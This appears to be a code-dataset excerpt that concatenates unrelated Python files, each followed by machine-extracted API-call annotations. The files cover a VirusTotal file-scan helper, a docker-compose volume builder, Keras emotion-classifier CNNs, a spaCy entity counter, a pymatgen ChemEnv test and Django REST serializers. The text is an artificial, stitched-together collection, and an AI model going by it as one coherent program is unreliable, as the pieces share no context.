] | [((3775, 3803), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (3785, 3803), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((4040, 4068), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (4050, 4068), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((5281, 5309), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (5291, 5309), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((5728, 5756), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (5738, 5756), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((6184, 6212), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (6194, 6212), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((6638, 6666), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (6648, 6666), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((7118, 7146), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (7128, 7146), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((7596, 7624), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (7606, 7624), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1171, 1192), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (1183, 1192), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1247, 1275), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (1257, 1275), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1390, 1411), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (1402, 1411), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1466, 1494), 'json.dumps', 'json.dumps', (['result'], {'indent': 
'(2)'}), '(result, indent=2)\n', (1476, 1494), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1686, 1707), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (1698, 1707), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1762, 1790), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (1772, 1790), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((1995, 2016), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (2007, 2016), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((2071, 2099), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (2081, 2099), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((2430, 2451), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (2442, 2451), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((2506, 2534), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (2516, 2534), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((3375, 3396), 'requests.get', 'requests.get', ([], {'url': 'uri'}), '(url=uri)\n', (3387, 3396), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((3451, 3479), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (3461, 3479), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((4375, 4403), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (4385, 4403), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((4755, 4783), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (4765, 4783), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((425, 458), 'base64.b64decode', 'base64.b64decode', (['self.api_Secret'], {}), '(self.api_Secret)\n', (441, 458), False, 'import time, base64, hmac, hashlib, json, 
requests\n'), ((691, 718), 'base64.b64encode', 'base64.b64encode', (['signature'], {}), '(signature)\n', (707, 718), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((2911, 2945), 'requests.get', 'requests.get', ([], {'url': "(uri + '&' + last)"}), "(url=uri + '&' + last)\n", (2923, 2945), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((3006, 3034), 'json.dumps', 'json.dumps', (['result'], {'indent': '(2)'}), '(result, indent=2)\n', (3016, 3034), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((612, 653), 'hmac.new', 'hmac.new', (['apiSecret', 'data', 'hashlib.sha256'], {}), '(apiSecret, data, hashlib.sha256)\n', (620, 653), False, 'import time, base64, hmac, hashlib, json, requests\n'), ((491, 502), 'time.time', 'time.time', ([], {}), '()\n', (500, 502), False, 'import time, base64, hmac, hashlib, json, requests\n')] |
import os
from pathlib import Path
from moonleap.utils.case import sn
from titan.project_pkg.dockercompose import DockerComposeConfig
def _make_abs(service, p):
result = Path(p)
if not Path(os.path.expandvars(p)).is_absolute():
base_path = Path("/opt") / sn(service.project.name) / service.name
result = base_path / p
return result
def get(opt_dir):
    """Build a dev/override docker-compose config whose service body mounts
    every tool opt-path of the service as a ``from:to`` volume string."""

    def build_service_body():
        svc = opt_dir.service
        mounts = [
            f"{str(_make_abs(svc, opt_path.from_path))}:{str(_make_abs(svc, opt_path.to_path))}"
            for tool in svc.tools
            for opt_path in tool.opt_paths.merged
        ]
        return {"volumes": mounts}

    return DockerComposeConfig(
        get_service_body=lambda x, service_name: build_service_body(),
        get_global_body=lambda x, service_name: {},
        is_dev=True,
        is_override=True,
    )
| [
"os.path.expandvars",
"moonleap.utils.case.sn",
"pathlib.Path"
] | [((177, 184), 'pathlib.Path', 'Path', (['p'], {}), '(p)\n', (181, 184), False, 'from pathlib import Path\n'), ((259, 271), 'pathlib.Path', 'Path', (['"""/opt"""'], {}), "('/opt')\n", (263, 271), False, 'from pathlib import Path\n'), ((274, 298), 'moonleap.utils.case.sn', 'sn', (['service.project.name'], {}), '(service.project.name)\n', (276, 298), False, 'from moonleap.utils.case import sn\n'), ((201, 222), 'os.path.expandvars', 'os.path.expandvars', (['p'], {}), '(p)\n', (219, 222), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 24 23:15:17 2020
@author: <NAME>
"""
import requests
def mals(file_dest):
    """Submit a file to the VirusTotal v2 API and check its scan report.

    :param file_dest: path of the file to scan
    :returns: 1 if any engine flagged the file, 0 if none did,
              2 if the report has no 'positives' field (not ready / unknown)
    """
    scan_url = 'https://www.virustotal.com/vtapi/v2/file/scan'
    params = {'apikey': '<KEY>'}
    # Close the file handle deterministically; the original leaked it.
    with open(file_dest, 'rb') as handle:
        files = {'file': (file_dest, handle)}
        response = requests.post(scan_url, files=files, params=params)
    res = response.json()['resource']
    report_url = 'https://www.virustotal.com/vtapi/v2/file/report'
    report = requests.get(report_url,
                 params={'apikey': '<KEY>', 'resource': res}).json()
    # Parse the JSON once instead of re-parsing on every access.
    if 'positives' not in report:
        return 2
    print(report['positives'])
    return 1 if int(report['positives']) > 0 else 0
"requests.post",
"requests.get"
] | [((320, 366), 'requests.post', 'requests.post', (['url'], {'files': 'files', 'params': 'params'}), '(url, files=files, params=params)\n', (333, 366), False, 'import requests\n'), ((597, 629), 'requests.get', 'requests.get', (['url'], {'params': 'params'}), '(url, params=params)\n', (609, 629), False, 'import requests\n')] |
# -*- coding: utf-8 -*-
"""
Created on Fri Sep 14 10:05:08 2018
Modified on Tue Nov 12 21:19:10 2019
@author1: <NAME>
@author2: <NAME>
"""
import keras.layers as L
import keras
import matplotlib.pyplot as plt
# get_model()
def get_model():
    """Build the baseline functional-API CNN for 48x48x1 grayscale images.

    Returns:
        keras.Model: uncompiled 7-class softmax classifier (base model for
        training; the 'bottleneck' layer is named for later feature
        extraction / transfer learning).
    """
    print("build_model.py..get_model().start...")
    # Renamed from 'input' to avoid shadowing the builtin input().
    inputs = L.Input(shape=(48, 48, 1))

    x = L.Conv2D(32, (3, 3), activation='relu', padding='same')(inputs)
    x = L.Conv2D(32, (3, 3), activation='relu')(x)
    x = L.Conv2D(64, (3, 3), activation='relu')(x)
    x = L.Dropout(0.5)(x)

    x = L.MaxPooling2D(pool_size=(3, 3))(x)

    # Flatten vector; named so features can be pulled out later.
    x = L.Flatten(name='bottleneck')(x)
    x = L.Dense(64, activation='relu')(x)
    x = L.Dropout(0.5)(x)
    output = L.Dense(7, activation='softmax')(x)

    model = keras.Model(input=inputs, output=output)
    print("model1__summary:")
    print(model.summary())
    print("build_model.py..get_model().end...")
    return model
# get_model()
def get_model2():
    """Build the same 7-class CNN as get_model(), via the Sequential API.

    Returns:
        keras.Sequential: uncompiled model; compilation is left to the caller.
    """
    # Unused names (Activation, ZeroPadding2D) dropped from the local imports;
    # the large commented-out duplicate of get_model() was removed as dead code.
    from keras.models import Sequential
    from keras.layers import Dense, Dropout, Flatten
    from keras.layers import Conv2D, MaxPool2D
    import keras

    model = Sequential()
    model.add(
        keras.layers.Input(
            shape=(48, 48, 1)
        )
    )
    # Two 32-filter conv layers followed by a 64-filter layer.
    model.add(
        Conv2D(
            filters=32,
            kernel_size=(3, 3),
            activation='relu',
            padding="same"
        )
    )
    model.add(
        Conv2D(
            filters=32,
            kernel_size=(3, 3),
            activation='relu'
        )
    )
    model.add(
        Conv2D(
            filters=64,
            kernel_size=(3, 3),
            activation='relu'
        )
    )
    model.add(Dropout(0.5))
    model.add(MaxPool2D(pool_size=(3, 3)))
    # Named so the feature vector can be extracted for transfer learning.
    model.add(Flatten(name="bottleneck"))
    model.add(Dense(64, activation='relu'))
    model.add(Dropout(rate=0.5))
    model.add(Dense(7, activation='softmax'))
    print("model2__summary:")
    print(model.summary())
    return model
# plot_training(history, filename)
def plot_training(history, filename):
    """Plot train/validation accuracy and loss curves and save them as PNGs.

    Args:
        history: Keras History object returned by model.fit(); must contain
            'acc', 'val_acc', 'loss' and 'val_loss' keys.
        filename: path prefix for the two output images.

    Returns:
        int: 0 on success (kept for backward compatibility with callers).
    """
    print("build_model.py..plot_training(history, filename).start...")
    epochs = range(len(history.history['val_acc']))
    # (train_key, val_key, metric_name, train_label, val_label)
    curves = [
        ('acc', 'val_acc', 'accuracy', 'train accuracy', 'validation accuracy'),
        ('loss', 'val_loss', 'loss', 'train loss', 'validation loss'),
    ]
    for train_key, val_key, metric, train_label, val_label in curves:
        plt.figure()
        plt.plot(epochs, history.history[train_key], 'b-', label=train_label)
        plt.plot(epochs, history.history[val_key], 'r-', label=val_label)
        plt.legend(loc='best')
        plt.title('Training and validation ' + metric)
        # Fixed typo: the accuracy image used to be saved as '<name>_accuray.png'.
        plt.savefig(filename + '_' + metric + '.png')
    print("build_model.py..plot_training(history, filename).end...")
    return 0
# plot_training(history, filename)
# __main__
# Smoke test: build both model variants and print their summaries when run
# directly as a script (no training, no plotting).
if __name__ == '__main__':
    print("build_model.py..__main__.start...")
    get_model()
    get_model2()
    print("build_model.py..__main__.end...")
# __main__
| [
"keras.layers.Conv2D",
"matplotlib.pyplot.savefig",
"keras.layers.Flatten",
"keras.layers.MaxPooling2D",
"keras.Model",
"matplotlib.pyplot.plot",
"keras.models.Sequential",
"keras.layers.Input",
"matplotlib.pyplot.figure",
"keras.layers.Dense",
"matplotlib.pyplot.title",
"keras.layers.MaxPool2... | [((526, 552), 'keras.layers.Input', 'L.Input', ([], {'shape': '(48, 48, 1)'}), '(shape=(48, 48, 1))\n', (533, 552), True, 'import keras.layers as L\n'), ((996, 1035), 'keras.Model', 'keras.Model', ([], {'input': 'input', 'output': 'output'}), '(input=input, output=output)\n', (1007, 1035), False, 'import keras\n'), ((1506, 1518), 'keras.models.Sequential', 'Sequential', ([], {}), '()\n', (1516, 1518), False, 'from keras.models import Sequential\n'), ((3692, 3704), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (3702, 3704), True, 'import matplotlib.pyplot as plt\n'), ((3709, 3767), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'output_acc', '"""b-"""'], {'label': '"""train accuracy"""'}), "(epochs, output_acc, 'b-', label='train accuracy')\n", (3717, 3767), True, 'import matplotlib.pyplot as plt\n'), ((3772, 3839), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_output_acc', '"""r-"""'], {'label': '"""validation accuracy"""'}), "(epochs, val_output_acc, 'r-', label='validation accuracy')\n", (3780, 3839), True, 'import matplotlib.pyplot as plt\n'), ((3844, 3866), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (3854, 3866), True, 'import matplotlib.pyplot as plt\n'), ((3871, 3916), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and validation accuracy"""'], {}), "('Training and validation accuracy')\n", (3880, 3916), True, 'import matplotlib.pyplot as plt\n'), ((3921, 3964), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '_accuray' + '.png')"], {}), "(filename + '_accuray' + '.png')\n", (3932, 3964), True, 'import matplotlib.pyplot as plt\n'), ((3970, 3982), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (3980, 3982), True, 'import matplotlib.pyplot as plt\n'), ((3987, 4042), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'output_loss', '"""b-"""'], {'label': '"""train loss"""'}), "(epochs, output_loss, 'b-', label='train loss')\n", 
(3995, 4042), True, 'import matplotlib.pyplot as plt\n'), ((4047, 4111), 'matplotlib.pyplot.plot', 'plt.plot', (['epochs', 'val_output_loss', '"""r-"""'], {'label': '"""validation loss"""'}), "(epochs, val_output_loss, 'r-', label='validation loss')\n", (4055, 4111), True, 'import matplotlib.pyplot as plt\n'), ((4117, 4139), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'loc': '"""best"""'}), "(loc='best')\n", (4127, 4139), True, 'import matplotlib.pyplot as plt\n'), ((4144, 4185), 'matplotlib.pyplot.title', 'plt.title', (['"""Training and validation loss"""'], {}), "('Training and validation loss')\n", (4153, 4185), True, 'import matplotlib.pyplot as plt\n'), ((4190, 4230), 'matplotlib.pyplot.savefig', 'plt.savefig', (["(filename + '_loss' + '.png')"], {}), "(filename + '_loss' + '.png')\n", (4201, 4230), True, 'import matplotlib.pyplot as plt\n'), ((562, 617), 'keras.layers.Conv2D', 'L.Conv2D', (['(32)', '(3, 3)'], {'activation': '"""relu"""', 'padding': '"""same"""'}), "(32, (3, 3), activation='relu', padding='same')\n", (570, 617), True, 'import keras.layers as L\n'), ((633, 672), 'keras.layers.Conv2D', 'L.Conv2D', (['(32)', '(3, 3)'], {'activation': '"""relu"""'}), "(32, (3, 3), activation='relu')\n", (641, 672), True, 'import keras.layers as L\n'), ((684, 723), 'keras.layers.Conv2D', 'L.Conv2D', (['(64)', '(3, 3)'], {'activation': '"""relu"""'}), "(64, (3, 3), activation='relu')\n", (692, 723), True, 'import keras.layers as L\n'), ((735, 749), 'keras.layers.Dropout', 'L.Dropout', (['(0.5)'], {}), '(0.5)\n', (744, 749), True, 'import keras.layers as L\n'), ((766, 798), 'keras.layers.MaxPooling2D', 'L.MaxPooling2D', ([], {'pool_size': '(3, 3)'}), '(pool_size=(3, 3))\n', (780, 798), True, 'import keras.layers as L\n'), ((832, 860), 'keras.layers.Flatten', 'L.Flatten', ([], {'name': '"""bottleneck"""'}), "(name='bottleneck')\n", (841, 860), True, 'import keras.layers as L\n'), ((872, 902), 'keras.layers.Dense', 'L.Dense', (['(64)'], {'activation': 
'"""relu"""'}), "(64, activation='relu')\n", (879, 902), True, 'import keras.layers as L\n'), ((914, 928), 'keras.layers.Dropout', 'L.Dropout', (['(0.5)'], {}), '(0.5)\n', (923, 928), True, 'import keras.layers as L\n'), ((945, 977), 'keras.layers.Dense', 'L.Dense', (['(7)'], {'activation': '"""softmax"""'}), "(7, activation='softmax')\n", (952, 977), True, 'import keras.layers as L\n'), ((1542, 1579), 'keras.layers.Input', 'keras.layers.Input', ([], {'shape': '(48, 48, 1)'}), '(shape=(48, 48, 1))\n', (1560, 1579), False, 'import keras\n'), ((1631, 1704), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(32)', 'kernel_size': '(3, 3)', 'activation': '"""relu"""', 'padding': '"""same"""'}), "(filters=32, kernel_size=(3, 3), activation='relu', padding='same')\n", (1637, 1704), False, 'from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D\n'), ((1792, 1849), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(32)', 'kernel_size': '(3, 3)', 'activation': '"""relu"""'}), "(filters=32, kernel_size=(3, 3), activation='relu')\n", (1798, 1849), False, 'from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D\n'), ((1925, 1982), 'keras.layers.Conv2D', 'Conv2D', ([], {'filters': '(64)', 'kernel_size': '(3, 3)', 'activation': '"""relu"""'}), "(filters=64, kernel_size=(3, 3), activation='relu')\n", (1931, 1982), False, 'from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D\n'), ((2049, 2061), 'keras.layers.Dropout', 'Dropout', (['(0.5)'], {}), '(0.5)\n', (2056, 2061), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2077, 2104), 'keras.layers.MaxPool2D', 'MaxPool2D', ([], {'pool_size': '(3, 3)'}), '(pool_size=(3, 3))\n', (2086, 2104), False, 'from keras.layers import Conv2D, MaxPool2D, ZeroPadding2D\n'), ((2120, 2146), 'keras.layers.Flatten', 'Flatten', ([], {'name': '"""bottleneck"""'}), "(name='bottleneck')\n", (2127, 2146), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2162, 2190), 'keras.layers.Dense', 
'Dense', (['(64)'], {'activation': '"""relu"""'}), "(64, activation='relu')\n", (2167, 2190), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2206, 2223), 'keras.layers.Dropout', 'Dropout', ([], {'rate': '(0.5)'}), '(rate=0.5)\n', (2213, 2223), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2239, 2269), 'keras.layers.Dense', 'Dense', (['(7)'], {'activation': '"""softmax"""'}), "(7, activation='softmax')\n", (2244, 2269), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n')] |
import pandas as pd
import time
from contextlib import contextmanager
from tqdm import tqdm
tqdm.pandas()
# nice way to report running times
@contextmanager
def timer(name):
    """Context manager that prints the wall-clock time (whole seconds)
    spent inside the managed block, tagged with *name*."""
    started = time.time()
    yield
    elapsed = time.time() - started
    print(f'[{name}] done in {elapsed:.0f} s')
def get_named_entities(df):
    """Count PERSON entities that are neither A nor B, per row.

    Hopefully this correlates with class "Neither".

    :param df: competition data with one extra field spacy_nlp_doc:
        precomputed nlp(text); assumes a 0..n-1 RangeIndex (uses .loc[i, ...])
    :return: DataFrame with a single "named_ent" column aligned to df.index
    """
    named_df = pd.DataFrame(0, index=df.index, columns=["named_ent"])
    with timer('Extracting named entities'):
        # Unused offset columns (A-offset, B-offset, Pronoun-offset) that the
        # original read into locals have been dropped.
        for i in range(len(df)):
            doc = df.loc[i, "spacy_nlp_doc"]
            A = df.loc[i, "A"]
            B = df.loc[i, "B"]
            # spaCy entities are spans, not tokens (e.g. a full name is one
            # entity), so compare the span text against A and B.
            persons = [
                ent for ent in doc.ents
                if ent.label_ == "PERSON" and ent.text not in (A, B)
            ]
            named_df.loc[i, "named_ent"] = len(persons)
    return named_df
| [
"pandas.DataFrame",
"tqdm.tqdm.pandas",
"time.time"
] | [((93, 106), 'tqdm.tqdm.pandas', 'tqdm.pandas', ([], {}), '()\n', (104, 106), False, 'from tqdm import tqdm\n'), ((186, 197), 'time.time', 'time.time', ([], {}), '()\n', (195, 197), False, 'import time\n'), ((537, 591), 'pandas.DataFrame', 'pd.DataFrame', (['(0)'], {'index': 'df.index', 'columns': "['named_ent']"}), "(0, index=df.index, columns=['named_ent'])\n", (549, 591), True, 'import pandas as pd\n'), ((238, 249), 'time.time', 'time.time', ([], {}), '()\n', (247, 249), False, 'import time\n')] |
from monty.dev import deprecated
import pytest
from pymatgen.core import Structure, Composition
from pymatgen.util.testing import PymatgenTest
from emmet.core.chemenv import ChemEnvDoc
# Reduced cells for a curated subset of pymatgen's bundled test structures,
# keyed by structure name; consumed as parametrize fixtures below.
test_structures = {
    name: struc.get_reduced_structure()
    for name, struc in PymatgenTest.TEST_STRUCTURES.items()
    if name
    in [
        "SiO2",
        "Li2O",
        "LiFePO4",
        "TlBiSe2",
        "K2O2",
        "Li3V2(PO4)3",
        "Li2O2",
        "CsCl",
        "NaFePO4",
        "Pb2TiZrO6",
        "SrTiO3",
        "TiO2",
        "BaNiO3",
        "VO2",
    ]
}
@pytest.mark.parametrize("structure", test_structures.values())
def test_chemenv(structure: Structure):
    """Smoke-test ChemEnvDoc generation on a handful of known structures."""
    print(f"Should work : {structure.composition}")
    doc = ChemEnvDoc.from_structure(
        structure=structure, material_id=33, deprecated=False
    )
    oxi_states = [getattr(site.specie, "oxi_state", None) for site in structure]
    known_states = [s for s in oxi_states if s is not None]
    warnings = doc.dict()["warnings"]
    if len(known_states) == len(structure):
        assert warnings is None
    elif structure.composition.almost_equals(Composition("CsCl")):
        # We do not have reference polyhedra above a certain number of
        # neighbors, and ChemEnv cannot deliver an answer without
        # oxidation states.
        assert warnings == "ChemEnv algorithm failed"
    else:
        assert warnings == "No oxidation states. Analysis will now include all bonds"
| [
"pymatgen.util.testing.PymatgenTest.TEST_STRUCTURES.items",
"emmet.core.chemenv.ChemEnvDoc.from_structure",
"pymatgen.core.Composition"
] | [((813, 898), 'emmet.core.chemenv.ChemEnvDoc.from_structure', 'ChemEnvDoc.from_structure', ([], {'structure': 'structure', 'material_id': '(33)', 'deprecated': '(False)'}), '(structure=structure, material_id=33, deprecated=False\n )\n', (838, 898), False, 'from emmet.core.chemenv import ChemEnvDoc\n'), ((270, 306), 'pymatgen.util.testing.PymatgenTest.TEST_STRUCTURES.items', 'PymatgenTest.TEST_STRUCTURES.items', ([], {}), '()\n', (304, 306), False, 'from pymatgen.util.testing import PymatgenTest\n'), ((1172, 1191), 'pymatgen.core.Composition', 'Composition', (['"""CsCl"""'], {}), "('CsCl')\n", (1183, 1191), False, 'from pymatgen.core import Structure, Composition\n')] |
"""Defines the serializers for Scale files and workspaces"""
from __future__ import unicode_literals
import rest_framework.serializers as serializers
from rest_framework.fields import CharField
from util.rest import ModelIdSerializer
class DataTypeField(CharField):
    """Field for displaying the list of data type tags for a Scale file"""

    type_name = 'DataTypeField'
    type_label = 'datatype'

    def to_representation(self, value):
        """Split the comma-separated data type string into a list of tags.

        :param value: the comma-separated data types for the Scale file
        :type value: str
        :rtype: list of str
        :returns: the list of data type tags (empty when value is blank)
        """
        if not value:
            return []
        return value.split(',')
class WktField(CharField):
    """Field for displaying geometry objects as Well Known Text"""

    type_name = 'WktField'
    # Fixed typo: the label was previously 'wtk'.
    type_label = 'wkt'

    def to_representation(self, value):
        """Converts the model field to WKT

        :param value: the associated geometry info
        :type value: GEOSGeometry
        :rtype: str or None
        :returns: the WKT representation, or None when no geometry is set
        """
        if value:
            return value.wkt
class GeoJsonField(CharField):
    """Field for displaying geometry objects as GeoJSON."""

    type_name = 'GeoJsonField'
    type_label = 'geojson'

    def to_representation(self, value):
        """Return the GeoJSON string for the geometry, or None when unset.

        :param value: the associated geometry info
        :type value: GEOSGeometry
        :rtype: str or None
        """
        return value.geojson if value else None
class WorkspaceBaseSerializer(ModelIdSerializer):
    """Converts workspace model fields to REST output (id + name only)"""
    name = serializers.CharField()
class WorkspaceSerializer(WorkspaceBaseSerializer):
    """Converts workspace model fields to REST output (list-level detail)"""
    title = serializers.CharField()
    description = serializers.CharField()
    base_url = serializers.URLField()
    is_active = serializers.BooleanField()
    # Sizes may exceed a 32-bit int for large workspaces, hence the TODOs.
    used_size = serializers.IntegerField()  # TODO: BigIntegerField?
    total_size = serializers.IntegerField()  # TODO: BigIntegerField?
    created = serializers.DateTimeField()
    archived = serializers.DateTimeField()
    last_modified = serializers.DateTimeField()
class WorkspaceDetailsSerializer(WorkspaceSerializer):
    """Converts workspace model fields to REST output (adds raw JSON config)"""
    json_config = serializers.JSONField(default=dict)
class ScaleFileBaseSerializerV5(ModelIdSerializer):
    """Converts Scale file model fields to REST output (v5 API base fields)"""
    workspace = WorkspaceBaseSerializer()
    file_name = serializers.CharField()
    media_type = serializers.CharField()
    file_type = serializers.CharField()
    file_size = serializers.IntegerField()  # TODO: BigIntegerField?
    data_type = DataTypeField()
    is_deleted = serializers.BooleanField()
    uuid = serializers.CharField()
    url = serializers.URLField()
    created = serializers.DateTimeField()
    deleted = serializers.DateTimeField()
    data_started = serializers.DateTimeField()
    data_ended = serializers.DateTimeField()
    source_started = serializers.DateTimeField()
    source_ended = serializers.DateTimeField()
    last_modified = serializers.DateTimeField()
class ScaleFileBaseSerializerV6(ModelIdSerializer):
    """Converts Scale file model fields to REST output (v6 API base: id + name)"""
    file_name = serializers.CharField()
class ScaleFileSerializerV5(ScaleFileBaseSerializerV5):
    """Converts Scale file model fields to REST output (v5 API full fields)"""
    file_path = serializers.CharField()
    # TODO: update to use GeoJson instead of WKT
    geometry = WktField()
    center_point = WktField()
    meta_data = serializers.JSONField(default=dict)
    countries = serializers.StringRelatedField(many=True, read_only=True)
class ScaleFileSerializerV6(ScaleFileBaseSerializerV6):
    """Converts Scale file model fields to REST output (v6 API full fields)"""
    # Class-body imports avoid circular imports between the serializer modules.
    from batch.serializers import BatchBaseSerializerV6
    from job.serializers import JobTypeBaseSerializerV6
    from recipe.serializers import RecipeTypeBaseSerializerV6
    workspace = WorkspaceBaseSerializer()
    media_type = serializers.CharField()
    file_type = serializers.CharField()
    file_size = serializers.IntegerField()  # TODO: BigIntegerField?
    file_path = serializers.CharField()
    is_deleted = serializers.BooleanField()
    url = serializers.URLField()
    created = serializers.DateTimeField()
    deleted = serializers.DateTimeField()
    data_started = serializers.DateTimeField()
    data_ended = serializers.DateTimeField()
    source_started = serializers.DateTimeField()
    source_ended = serializers.DateTimeField()
    last_modified = serializers.DateTimeField()
    # TODO: update to use GeoJson instead of WKT
    geometry = WktField()
    center_point = WktField()
    countries = serializers.StringRelatedField(many=True, read_only=True)
    # Provenance: which job/recipe/batch produced this file.
    job_type = JobTypeBaseSerializerV6()
    job = ModelIdSerializer()
    job_exe = ModelIdSerializer()
    job_output = serializers.CharField()
    recipe_type = RecipeTypeBaseSerializerV6()
    recipe = ModelIdSerializer()
    recipe_node = serializers.CharField()
    batch = BatchBaseSerializerV6()
    is_superseded = serializers.BooleanField()
    superseded = serializers.DateTimeField()
class ScaleFileDetailsSerializerV6(ScaleFileSerializerV6):
    """Converts file model fields to REST output (adds raw metadata JSON)"""
    meta_data = serializers.JSONField(default=dict)
| [
"rest_framework.serializers.DateTimeField",
"batch.serializers.BatchBaseSerializerV6",
"rest_framework.serializers.IntegerField",
"rest_framework.serializers.BooleanField",
"rest_framework.serializers.URLField",
"rest_framework.serializers.JSONField",
"rest_framework.serializers.StringRelatedField",
"... | [((1848, 1871), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (1869, 1871), True, 'import rest_framework.serializers as serializers\n'), ((1995, 2018), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2016, 2018), True, 'import rest_framework.serializers as serializers\n'), ((2037, 2060), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2058, 2060), True, 'import rest_framework.serializers as serializers\n'), ((2076, 2098), 'rest_framework.serializers.URLField', 'serializers.URLField', ([], {}), '()\n', (2096, 2098), True, 'import rest_framework.serializers as serializers\n'), ((2115, 2141), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {}), '()\n', (2139, 2141), True, 'import rest_framework.serializers as serializers\n'), ((2159, 2185), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {}), '()\n', (2183, 2185), True, 'import rest_framework.serializers as serializers\n'), ((2229, 2255), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {}), '()\n', (2253, 2255), True, 'import rest_framework.serializers as serializers\n'), ((2297, 2324), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (2322, 2324), True, 'import rest_framework.serializers as serializers\n'), ((2340, 2367), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (2365, 2367), True, 'import rest_framework.serializers as serializers\n'), ((2388, 2415), 'rest_framework.serializers.DateTimeField', 'serializers.DateTimeField', ([], {}), '()\n', (2413, 2415), True, 'import rest_framework.serializers as serializers\n'), ((2548, 2583), 'rest_framework.serializers.JSONField', 'serializers.JSONField', ([], {'default': 'dict'}), '(default=dict)\n', (2569, 2583), True, 'import rest_framework.serializers as serializers\n'), ((2755, 2778), 
'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2776, 2778), True, 'import rest_framework.serializers as serializers\n'), ((2796, 2819), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2817, 2819), True, 'import rest_framework.serializers as serializers\n'), ((2836, 2859), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (2857, 2859), True, 'import rest_framework.serializers as serializers\n'), ((2876, 2902), 'rest_framework.serializers.IntegerField', 'serializers.IntegerField', ([], {}), '()\n', (2900, 2902), True, 'import rest_framework.serializers as serializers\n'), ((2978, 3004), 'rest_framework.serializers.BooleanField', 'serializers.BooleanField', ([], {}), '()\n', (3002, 3004), True, 'import rest_framework.serializers as serializers\n'), ((3016, 3039), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {}), '()\n', (3037, 3039), True, 'import rest_framework.serializers as serializers\n'), ((3050, 3072), 